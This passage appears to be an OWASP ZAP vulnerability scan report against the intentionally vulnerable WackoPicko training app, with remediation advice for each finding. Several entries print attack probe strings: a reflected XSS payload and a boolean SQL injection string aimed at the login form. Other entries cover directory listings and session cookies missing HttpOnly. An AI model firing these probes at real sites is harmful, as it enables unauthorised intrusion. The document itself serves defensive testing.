Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Suspicious)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
'"<script>alert(1);</script>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning)SQL Injection

Description

SQL injection may be possible

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
ZAP' AND '1'='1' --
Other information
The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' AND '1'='2' -- ] The parameter value being modified was NOT stripped from the HTML output for the purposes of the comparison Data was returned for the original parameter. The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter

Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id

89

WASC Id

19

High (Warning)SQL Injection

Description

SQL injection may be possible

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
ZAP' AND '1'='1' --
Other information
The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' AND '1'='2' -- ] The parameter value being modified was stripped from the HTML output for the purposes of the comparison Data was returned for the original parameter. The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter

Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id

89

WASC Id

19

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/css/blueprint/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/pictures/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/doggie/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/flowers/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/house/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/toga/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/waterfall/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning)Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files , backup source files etc which be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/users/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files does not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in directory or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/users/home.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/users/home.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/action.swf?directory=%2FWackoPicko%2F

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID
Attack
3to91o8a8k8e5kr8ob87umq081; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID
Attack
v4s19tq25v45ffl2m1oln5chc1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID
Attack
h125dko1e4254cmu5p2lft1dm1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID
Attack
2qg2mi763dgvu7qfphcj8uvck3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID
Attack
id7o978shnrd5ddfjm1cbcjuc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID
Attack
qbf5uslrv6qehbdn22vhvul8d4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID
Attack
kagmsnnuhuo38usierjgbje4g0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID
Attack
9at9eje0in752f3jleuslrs446; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID
Attack
0lig0nccr40asgp8b92i9jtpu7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID
Attack
1ibt4cfue8gtgvqa0ifasroht3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID
Attack
jnmmg4lon9hqtdqcj7l5lob4j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID
Attack
j6asp50ige6pbhcgk103ketmp2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID
Attack
v6bmrhud1ra09797s5oqe9m9c2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID
Attack
v8lsnk91utdobfk2e5t7rogel6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID
Attack
fav8k33bdu53fk4cftmati0006; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID
Attack
tu8humhbikk81lun726fhhjke2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID
Attack
knqtmo4j06f6vceq7hejtf2ql7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID
Attack
mgkto7tjfho7sut283313s11v2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID
Attack
7on14b3snkhfl710qppi62phc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID
Attack
ub3n7og2p0vlmpp8ono431s1t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID
Attack
s76merjj1k1jecnqbf4upn1ai1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID
Attack
hmdvkmpt78s0g11idc9id3s8o2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555
Parameter
PHPSESSID
Attack
1vljoojisdmba2cbi6p1dt3jr1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955
Parameter
PHPSESSID
Attack
uglpu7h37jrtlfmcpqsn7avp25; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355
Parameter
PHPSESSID
Attack
u4mims6bklah44t7ufatmuiak6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755
Parameter
PHPSESSID
Attack
lb6u9cdc9gce6no9uop5on59l7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155
Parameter
PHPSESSID
Attack
pksol2i7ru6l9pc442ujadkiv7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555
Parameter
PHPSESSID
Attack
126fkl17ufn46ub2jqkore52b1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955
Parameter
PHPSESSID
Attack
d2uia8euo7u98bs21l9sr27h30; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

